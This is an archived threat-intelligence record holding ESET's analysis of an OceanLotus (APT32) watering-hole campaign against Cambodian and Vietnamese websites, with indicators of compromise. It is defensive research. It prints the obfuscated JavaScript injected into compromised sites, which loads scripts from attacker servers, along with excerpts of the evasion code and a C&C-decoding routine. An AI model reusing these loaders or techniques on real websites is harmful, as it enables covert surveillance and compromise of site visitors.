{ "id": "96984459-eb47-4511-96a5-29d068f03f4b", "created_at": "2026-04-06T00:19:44.683408Z", "updated_at": "2026-04-10T03:36:22.057346Z", "deleted_at": null, "sha1_hash": "684315df0f073fbac567137a9c692eb12eede0f1", "title": "OceanLotus: New watering hole attack in Southeast Asia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 609636, "plain_text": "OceanLotus: New watering hole attack in Southeast Asia\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 20:18:56 UTC\r\nESET researchers have discovered a new watering hole campaign targeting several websites in Southeast Asia, and that is\r\nbelieved to have been active since September 2018. This campaign stands out because of its large scale, as we were able to\r\nidentify 21 compromised websites, some of which are particularly notable. Among the compromised websites were the\r\nMinistry of Defense of Cambodia, the Ministry of Foreign Affairs and International Cooperation of Cambodia and several\r\nVietnamese newspaper or blog websites.\r\nAfter thorough analysis, we are highly confident that this campaign is run by the OceanLotus group [1], also known as\r\nAPT32 [2] and APT-C-00. OceanLotus is an espionage group active since at least 2012 [3], mainly interested in foreign\r\ngovernments and dissidents.\r\nThis campaign is believed to be an evolution of what Volexity researchers called OceanLotus Framework B, a watering hole\r\nscheme they documented in 2017 [4]. However, the attackers have stepped up their game to complicate and slow down\r\nanalysis of their malicious framework. Among the various improvements, they started using public key cryptography to\r\nexchange an AES session key, used to encrypt further communications, thus preventing security products from intercepting\r\nthe final payload. They also switched from HTTP to WebSocket to hide their malicious communications.\r\nESET researchers identified 21 distinct websites that had been compromised, each redirecting to a separate domain\r\ncontrolled by the attackers.\r\nFigure 1 shows the region targeted by this campaign.\r\nFigure 1 - Location of the compromised websites\r\nMost of the compromised domains are related to news media or the Cambodian government. The following table details the\r\ndifferent victims. We notified all of them in October but most are still serving malicious script injections at the time of\r\nwriting, two months after the first compromise. Thus, we encourage you not to visit these websites.\r\nCompromised domain Description\r\nbaotgm[.]net Media in Vietnamese (based in Arlington, Texas)\r\ncnrp7[.]org Cambodia National Rescue Party\r\nconggiaovietnam[.]net Related to Religion – In Vietnamese\r\ndaichungvienvinhthanh[.]com Related to Religion – In Vietnamese\r\ndanchimviet[.]info Media in Vietnamese\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 1 of 8\n\nCompromised domain Description\r\ndanviet[.]vn Media in Vietnamese\r\ndanviethouston[.]com Media in Vietnamese\r\nfvpoc[.]org Former Vietnamese Prisoners of Conscience\r\ngardencityclub[.]com Golf club in Phnom Penh, Kingdom of Cambodia\r\nlienketqnhn[.]org Media in Vietnamese\r\nmfaic.gov[.]kh Ministry of Foreign Affairs and International Cooperation of Cambodia\r\nmod.gov[.]kh Ministry of Defense of Cambodia\r\nmtgvinh[.]net Related to Religion – In Vietnamese\r\nnguoitieudung.com[.]vn Media in Vietnamese\r\nphnompenhpost[.]com Cambodian newspaper in English\r\nraovatcalitoday[.]com Unknown – In Vietnamese\r\nthongtinchongphandong[.]com Opposition media in Vietnamese\r\ntinkhongle[.]com Media in Vietnamese\r\ntoithichdoc.blogspot[.]com Blog in Vietnamese\r\ntrieudaiviet[.]com Unknown – In Vietnamese\r\ntriviet[.]news Media in Vietnamese\r\nTable 1 - Description of the compromised websites\r\nGenerally, in a watering hole attack, the adversaries compromise websites that are regularly visited by potential targets.\r\nHowever, in this attack, OceanLotus was also able to compromise some websites that attract large numbers of visitors in\r\ngeneral, not just their presumed targets. The following table shows the Alexa rank at the time of writing (the lower the rank,\r\nthe more visited) of the compromised websites. For instance, they compromised the Dan Viet newspaper website\r\n(danviet[.]vn), which is the 116th most visited website in Vietnam.\r\nDomain Alexa rank (global) Alexa rank (in the most popular country)\r\ndanviet[.]vn 12,887 116\r\nphnompenhpost[.]com 85,910 18,880\r\nnguoitieudung.com[.]vn 261,801 2,397\r\ndanchimviet[.]info 287,852 144,884\r\nbaotgm[.]net 675,669 119,737\r\ntoithichdoc.blogspot[.]com 700,470 11,532\r\nmfaic.gov[.]kh 978,165 2,149\r\nconggiaovietnam[.]net 1,040,548 15,368\r\nthongtinchongphandong[.]com 1,134,691 21,575\r\ntinkhongle[.]com 1,301,722 15,224\r\ndaichungvienvinhthanh[.]com 1,778,418 23,428\r\ntriviet[.]news 2,767,289 Not available\r\nmod.gov[.]kh 4,247,649 3,719\r\nraovatcalitoday[.]com 8,180,358 Not available\r\ncnrp7[.]org 8,411,693 Not available\r\nmtgvinh[.]net 8,415,468 Not available\r\ndanviethouston[.]com 8,777,564 Not available\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 2 of 8\n\nDomain Alexa rank (global) Alexa rank (in the most popular country)\r\nlienketqnhn[.]org 16,109,635 Not available\r\ngardencityclub[.]com 16,109,635 Not available\r\ntrieudaiviet[.]com 16,969,048 Not available\r\nfvpoc[.]org Not available Not available\r\nTable 2 - Alexa rank of the compromised websites\r\nAnalysis\r\nThe modus operandi is similar on all compromised websites. The attackers add a small piece of JavaScript code either in the\r\nindex page or in a JavaScript file hosted on the same server. The piece of code in Figure 2, slightly obfuscated, then loads\r\nanother script from a server controlled by the attackers. The following code, added in https://www.mfaic.gov[.]kh/wp-content/themes/ministry-of-foreign-affair/slick/slick.min.js, will load the file from\r\nhttps://weblink.selfip[.]info/images/cdn.js?from=maxcdn.\r\n(function() {\r\n var pt = \"http\";\r\n var l = document.createElement('script');\r\n l.src = pt + \"s://\" + arguments[0] + arguments[2] + arguments[3] + 'ip.' + 'info/images/cdn.js?from=maxcdn';\r\n document.getElementsByTagName('body')[0].appendChild(l)\r\n})('web', 'a', 'link', '.self');\r\nFigure 2 – Piece of JavaScript code added to mfaic.gov[.]kh\r\nIn order to evade detection, they take the following measures:\r\nThey obfuscate the scripts to prevent static extraction of the final URL.\r\nThe URL looks like a real JavaScript library used by the website.\r\nThey use one different domain and URI per compromised website.\r\nThe script is different per compromised website. The following piece of code is the script inserted into another\r\ncompromised website:\r\nvar script = document.createElement(\"script\");\r\nvar i = 'crash-course';\r\nvar s = \"fzgbc knowsztall znfo\";\r\nvar _ = '/';\r\nvar e = \"VisitorIdentification.js?sa=\" + i;\r\nscript.async = true;\r\nscript.src = \"htt\" + \"ps:\" + _ + _ + s.split(\" \").map(x =\u003e x.replace(\"z\", \"i\")).join(\".\") + _ + e;\r\nvar doc = document.getElementsByTagName('script')[0];\r\ndoc.parentNode.insertBefore(script, doc);\r\nFigure 3 - Another piece of JavaScript inserted in a targeted website\r\nFirst stage\r\nDepending on the location of the IP address of the visitor, the first stage server, e.g. weblink.selfip[.]info for mfaic.gov[.]kh,\r\ndelivers either a decoy script (a random legitimate JavaScript library) or the first stage script (SHA-1:\r\n2194271C7991D60AE82436129D7F25C0A689050A for example). Not all the servers have a location check but when it is\r\nenabled, only visitors from Vietnam and Cambodia actually receive the malicious script.\r\nThe first stage script contains several checks to evade detection, as shown in Figure 4.\r\n[…]\r\nfunction t(n) {\r\n var r = this;\r\n !function (t, n) {\r\n if (!(t instanceof n))\r\n throw new TypeError('Cannot call a class as a function');\r\n }(this, t), this.t = {\r\n o: null,\r\n s: !0\r\n }, this.scr = !0, this.r(), this.i = !0, window.addEventListener('scroll', function () {\r\n r.i || r.scr \u0026\u0026 !r.t.s \u0026\u0026 (r.scr = !1, r.c(n)), r.i = !1;\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 3 of 8\n\n});\r\n}\r\nreturn t.prototype.r = function () {\r\n var t = this;\r\n setInterval(function () {\r\n var n = window.outerWidth - window.innerWidth \u003e 160, r = window.outerHeight - window.innerHeight \u003e 160, e = n ? 'v\r\n r \u0026\u0026 n || !(window.Firebug \u0026\u0026 window.Firebug.chrome \u0026\u0026 window.Firebug.chrome.isInitialized || n || r) ? (t.t.s = !\r\n }, 500);\r\n}\r\n […]\r\nFigure 4 - First stage JavaScript payload\r\nThe script will wait until the victim scrolls on the page. It also checks the resolution of the window and whether Firebug, a\r\nbrowser extension used to analyze webpages, is enabled. If either of the checks fails, it stops the execution.\r\nThen, it decrypts the Command \u0026 Control domain using a custom algorithm. For instance,\r\n3B37371M1B1B382R332V1A382W36392W2T362T1A322T38 will be decrypted to wss://tcog.thruhere[.]net. For each\r\nfirst stage domain, the attackers also register a different second stage domain, each one being hosted on a different server.\r\nThe code in Figure 5 is an equivalent, in Python, of the decryption function.\r\ndef decrypt(encrypted_url):\r\ns = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\nreturn \"\".join(chr(s.index(encrypted_url[e]) * 36 + s.index(encrypted_url[e+1])) for e in range(0,len(encrypted_u\r\nFigure 5 - Python code to decrypt the C\u0026C servers\r\nOnce the C\u0026C address is decrypted, the script sends a unique string of 15 digits, then receives and executes a second-stage\r\nscript. All communications are performed through WebSocket over SSL. This protocol allows full duplex communication\r\nbetween a client and a server. It means that, once the client establishes a connection, a server can send data to the client even\r\nif the client did not send a request. However, in this particular case, the principal goal of using web sockets seems to be to\r\nevade detection.\r\nSecond stage\r\nThe second stage script is actually a reconnaissance script. The OceanLotus developers reused Valve’s fingerprintjs2 library,\r\navailable on GitHub, slightly modifying it in order to add network communication and a custom report.\r\nFigure 6 describes the different actions executed by the script. All the communications go through the WebSocket session\r\nopened by the first stage.\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 4 of 8\n\nFigure 6 - Flow of the second stage payload\r\nThe communication is encrypted using an AES session key, generated by the server. It is encrypted with an RSA 1024-bit\r\npublic key and sent to the client. Thus, it is not possible to decrypt the communications between the client and the server.\r\nIn comparison to the previous iterations of their watering hole framework, this will make it much more difficult for\r\ndefenders, because the data sent over the network cannot be detected then decrypted. This will prevent network detection of\r\nthe data. The public key sent by the server is always the same and is available in the IoCs section.\r\nThis recon script builds a report, similar to the one shown below, and sends it to the second stage C\u0026C server.\r\n{\r\n \"history\": {\r\n \"client_title\": \"Ministry%20of%20Foreign%20Affairs%20and%20International%20Cooperation%20-\",\r\n \"client_url\": \"https://www.mfaic.gov.kh/\",\r\n \"client_cookie\": \"\",\r\n \"client_hash\": \"\",\r\n \"client_referrer\": \"https://www.mfaic.gov.kh/foreign-ngos\",\r\n \"client_platform_ua\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.344\r\n \"client_time\": \"2018-10-21T12:43:25.254Z\",\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 5 of 8\n\n\"timezone\": \"Asia/Bangkok\",\r\n \"client_network_ip_list\": [\r\n \"192.168.x.x\",\r\n \"x.x.x.x\"\r\n ],\r\n \"client_api\": \"wss://tcog.thruhere.net/\",\r\n \"client_zuuid\": \"defaultcommunications39e10c84a0546508c58d48ae56ab7c7eca768183e640a1ebbb0cceaef0bd07cedefaultcommunica\r\n \"client_uuid\": \"a612cdb028e1571dcab18e4aa316da26\"\r\n },\r\n \"navigator\": {\r\n \"plugins\": {\r\n \"activex\": false,\r\n \"cors\": true,\r\n \"flash\": false,\r\n \"java\": false,\r\n \"foxit\": true,\r\n \"phonegap\": false,\r\n \"quicktime\": false,\r\n \"realplayer\": false,\r\n \"silverlight\": false,\r\n \"touch\": false,\r\n \"vbscript\": false,\r\n \"vlc\": false,\r\n \"webrtc\": true,\r\n \"wmp\": false\r\n },\r\n \"_screen\": {\r\n \"width\": 1920,\r\n \"height\": 1080,\r\n \"availWidth\": 1920,\r\n \"availHeight\": 1080,\r\n \"resolution\": \"1920x1080\"\r\n },\r\n \"_plugins\": [\r\n[...]\r\nFigure 7 - Fingerprint report\r\nThis report is nearly identical to the report generated from OceanLotus Framework B, documented by Volexity researchers\r\nin 2017. The different sections are similar and they include identical typos. Thanks to these similarities and the location of\r\nthe targets, we are highly confident that OceanLotus runs this campaign.\r\nThe report generated contains detailed information about the victim browser and the website visited: the user-agent, the\r\nHTTP Referer, the local and external IP address, the browser plugins the browser’s configured language preferences.\r\nAlso, there are two unique identifiers per machine, called client_zuuid and client_uuid. They are probably used to identify\r\nusers and track them across visits. These identifiers were actually already present in the 2017 version of the framework and\r\nclient_uuid was computed in a similar way.\r\nThe client_zuuid is the concatenation of the different deviceId values contained in\r\nnavigator.mediaDevices.enumerateDevices. The devices are the external devices accessible to the browser, such as cameras\r\nor microphones. Thus, this value should be the same for a given user during their different visits from the same computer.\r\nThe client_uuid is a MD5 hash of some fingerprint information extracted by fingerprintjs2. Among the collected information\r\nare the browser user-agent, the language, the time zone, the browser plugins, and the fonts available in the browser. Again,\r\nthis value should be identical across visits, unless, for example, the user updates the browser or uses a different device.\r\nFinally, the server can send additional JavaScript code to the victimized computer, probably the actual payload.\r\nUnfortunately, due to the use of an AES session key to encrypt the communications, we were not able to identify in-the-wild\r\nexamples of payloads sent by the attackers. In addition, the payloads are only delivered to specific targets. Thus, it was not\r\npossible to get them using a test machine. However, according to previous reports, these OceanLotus watering hole\r\ncampaigns aim to phish its victims. For example, Volexity reported that users were shown a pop-up asking to approve\r\nOAuth access to the victim’s Google account for an OceanLotus Google App. Using this technique, attackers can get access\r\nto the victim’s contacts and emails.\r\nNetwork infrastructure\r\nIn order to be as stealthy as possible, the OceanLotus operators registered one first stage and one second stage domain per\r\ncompromised website. Each domain is hosted on a separate server with a distinct IP address. They registered at least 50\r\ndomains and 50 servers for this campaign.\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 6 of 8\n\nWhile most of the first-stage domains were registered on free domain name services, most of the second stage domains are\r\npaid domain names. They also mimic genuine websites in order to seem legitimate. Table 3 shows some services mimicked\r\nby the attackers.\r\nC\u0026C domain Legitimate domain\r\ncdn-ampproject[.]com cdn.ampproject.com\r\nbootstraplink [.]com getbootstrap.com\r\nsskimresources[.]com s.skimresources.com\r\nwidgets-wp[.]com widgets.wp.com\r\nTable 3 - Legitimate websites mimicked by the attackers\r\nThe number of domains used and their similarity to legitimate websites probably makes them harder to detect for a human\r\neye looking at the network traffic.\r\nConclusion\r\nDespite being actively tracked by many researchers, the OceanLotus group is still very busy attacking targets in Southeast\r\nAsia. They also regularly improve their toolset, including their watering hole framework and their Windows and MacOS\r\nmalware. The recent updates to their watering hole framework, highlighted in this blog, show a level of sophistication never\r\nbefore seen for OceanLotus. This is yet another reminder that this APT group should be closely tracked.\r\nIn order to limit the number of victims, we notified each compromised website owner and explained how to remove the\r\nmalicious JavaScript code although some seem very resistant to being informed or helped.\r\nESET Researchers will continue tracking any development of the OceanLotus toolset. Indicators of Compromise can also be\r\nfound on GitHub. For any inquiries, or to make sample submissions related to the subject, contact us at\r\nthreatintel@eset.com\r\nReferences\r\n[1]         ESET Research, \"OceanLotus: Old techniques, new backdoor,\" 03 2018. [Online]. Available: https://web-assets.esetstatic.com/wls/2018/03/ESET_OceanLotus.pdf.\r\n[2]         N. Carr, \"Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations,\" FireEye, 14 05 2017.\r\n[Online]. Available: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html.\r\n[3]         Sky Eye Lab, \"OceanLotus APT Report Summary,\" 29 05 2015. [Online]. Available:\r\nhttp://blogs.360.cn/post/oceanlotus-apt.html.\r\n[4]         S. K. S. A. Dave Lassalle, \"OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian\r\nNations, the Media, Human Rights Groups, and Civil Society,\" Volexity, 06 11 2017. [Online]. Available:\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/.\r\nIndicators of Compromise (IoCs)\r\nFiles\r\nDescription SHA-1 SHA-256\r\nFirst stage\r\nscript\r\n2194271C7991D60AE82436129D7F25C0A689050A 1EDA0DE280713470878C399D3FB6C331BA0FADD0BD9802ED98AE\r\nSecond\r\nstage script\r\n996D0AC930D2CDB16EF96EDC27D9D1AFC2D89CA8 8B824BE52DE7A8723124BAD5A45664C574D6E905F300C35719F1E6\r\nNetwork IoCs\r\nCompromised website 1st stage IP address 2nd stage IP address\r\nbaotgm[.]net arabica.podzone[.]net 178.128.103.24 10cm.mypets[.]ws 178.128.100.189\r\ncnrp7[.]org utagscript[.]com 206.189.88.50 optnmstri[.]com 159.65.134.146\r\nconggiaovietnam[.]net lcontacts.servebbs[.]net 178.128.219.207 imgincapsula[.]com 209.97.164.158\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 7 of 8\n\nCompromised website 1st stage IP address 2nd stage IP address\r\ndaichungvienvinhthanh[.]com sskimresources[.]com 178.128.90.102\r\nsecure-imrworldwide[.]com\r\n178.128.90.109\r\ndanchimviet[.]info wfpscripts.homeunix[.]com 178.128.223.102\r\ncdn-ampproject[.]com\r\n178.128.24.201\r\ndanviet[.]vn cdnscr.thruhere[.]net 178.128.98.139 io.blogsite[.]org 178.128.98.89\r\ndanviethouston[.]com your-ip.getmyip[.]com 178.128.103.74 [Unknown] [Unknown]\r\nfvpoc[.]org gui.dnsdojo[.]net 178.128.28.93 cdnazure[.]com 209.97.164.96\r\ngardencityclub[.]com figbc.knowsitall[.]info 178.128.103.207\r\nichefbcci.is-a-chef[.]com\r\n206.189.85.162\r\nlienketqnhn[.]org tips-renew.webhop[.]info 159.65.7.45 cyhire.cechire[.]com 178.128.103.79\r\nmfaic.gov[.]kh weblink.selfip[.]info 178.128.103.202 tcog.thruhere[.]net 178.128.107.83\r\nmfaic.gov[.]kh s0-2mdn[.]net 104.248.144.178 p-typekit[.]com 104.248.144.136\r\nmod.gov[.]kh static.tagscdn[.]com 206.189.95.214 pagefairjs[.]com 159.65.137.109\r\nmtgvinh[.]net metacachecdn[.]com 178.128.209.153 bootstraplink[.]com 159.65.129.241\r\nnguoitieudung.com[.]vn s-adroll[.]com 128.199.159.127\r\nplayer-cnevids[.]com\r\n128.199.159.60\r\nphnompenhpost[.]com tiwimg[.]com 206.189.89.121 tiqqcdn[.]com 206.189.47.116\r\nraovatcalitoday[.]com widgets-wp[.]com 178.128.90.107 cdn-tynt[.]com 142.93.75.192\r\nthongtinchongphandong[.]com lb-web-stat[.]com 159.65.128.57 benchtag2[.]com 178.128.90.108\r\ntinkhongle[.]com cdn1.shacknet[.]us 142.93.127.120 scdn-cxense[.]com 142.93.75.161\r\ntoithichdoc.blogspot[.]com assets-cdn.blogdns[.]net 178.128.28.89 cart.gotdns[.]com 206.189.145.242\r\ntrieudaiviet[.]com html5.endofinternet[.]net 178.128.90.182\r\neffecto-azureedge[.]net\r\n142.93.71.92\r\ntriviet[.]news ds-aksb-a.likescandy[.]com 159.65.137.144 labs-apnic[.]net 178.128.90.138\r\n[Unknown] pixel1.dnsalias[.]net 142.93.116.157 ad-appier[.]com 178.128.90.66\r\n[Unknown] trc.webhop[.]net 178.128.90.223\r\nstatic-addtoany[.]com\r\n142.93.75.172\r\n[Unknown] nav.neat-url[.]com 178.128.103.205\r\nstraits-times.is-an-actor[.]com\r\n178.128.107.24\r\nRSA Public Key sent by the server\r\n-----BEGIN PUBLIC KEY-----\r\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDI8O2kXpKec4MBVeF2g86GtT2X\r\n/ABJB2M+urEvxJStRuL/+u/a9oJ6XL4JTFceYqJiSsXvwD/wDfgI00zCdmJ7xgw+\r\nrpGyuSntLH2Ox5oVxTTUQB791WJByDjtKXYBHpIBrmePG1EcnTlfBhgHhpAeZEao\r\nhEXZ94it73j02h+JtQIDAQAB\r\n-----END PUBLIC KEY-----\r\nSource: https://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/" ], "report_names": [ "oceanlotus-new-watering-hole-attack-southeast-asia" ], "threat_actors": [ { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": [ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2439ad53-39cc-4fff-8fdf-4028d65803c0", "created_at": "2022-10-25T16:07:23.353204Z", "updated_at": "2026-04-10T02:00:04.55407Z", "deleted_at": null, "main_name": "APT 32", "aliases": [ "APT 32", "APT-C-00", "APT-LY-100", "ATK 17", "G0050", "Lotus Bane", "Ocean Buffalo", "OceanLotus", "Operation Cobalt Kitty", "Operation PhantomLance", "Pond Loach", "SeaLotus", "SectorF01", "Tin Woodlawn" ], "source_name": "ETDA:APT 32", "tools": [ "Agentemis", "Android.Backdoor.736.origin", "AtNow", "Backdoor.MacOS.OCEANLOTUS.F", "BadCake", "CACTUSTORCH", "CamCapture Plugin", "CinaRAT", "Cobalt Strike", "CobaltStrike", "Cuegoe", "DKMC", "Denis", "Goopy", "HiddenLotus", "KOMPROGO", "KerrDown", "METALJACK", "MSFvenom", "Mimikatz", "Nishang", "OSX_OCEANLOTUS.D", "OceanLotus", "PHOREAL", "PWNDROID1", "PhantomLance", "PowerSploit", "Quasar RAT", "QuasarRAT", "RatSnif", "Remy", "Remy RAT", "Rizzo", "Roland", "Roland RAT", "SOUNDBITE", "Salgorea", "Splinter RAT", "Terracotta VPN", "Yggdrasil", "cobeacon", "denesRAT", "fingerprintjs2" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434784, "ts_updated_at": 1775792182, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/684315df0f073fbac567137a9c692eb12eede0f1.pdf", "text": "https://archive.orkl.eu/684315df0f073fbac567137a9c692eb12eede0f1.txt", "img": "https://archive.orkl.eu/684315df0f073fbac567137a9c692eb12eede0f1.jpg" } }